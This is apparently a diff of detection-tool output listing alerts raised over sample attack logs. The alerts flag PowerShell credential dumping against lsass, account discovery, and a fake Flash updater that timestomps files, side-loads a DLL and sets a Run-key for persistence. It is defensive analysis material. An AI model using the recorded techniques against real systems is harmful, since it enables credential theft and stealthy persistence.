+2019-04-19 01:58:13.740 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.871 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:34.168 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:34.448 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:34.659 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:34.689 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.680 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:49.961 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 365ABB72-AB28-5CB8-0000-001025060100 | Hash: SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:03:03.321 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:03:03.441 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-28 00:57:25.868 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:27.087 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 365ABB72-7AB0-5CC4-0000-0010C5BE0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.587 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,2,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
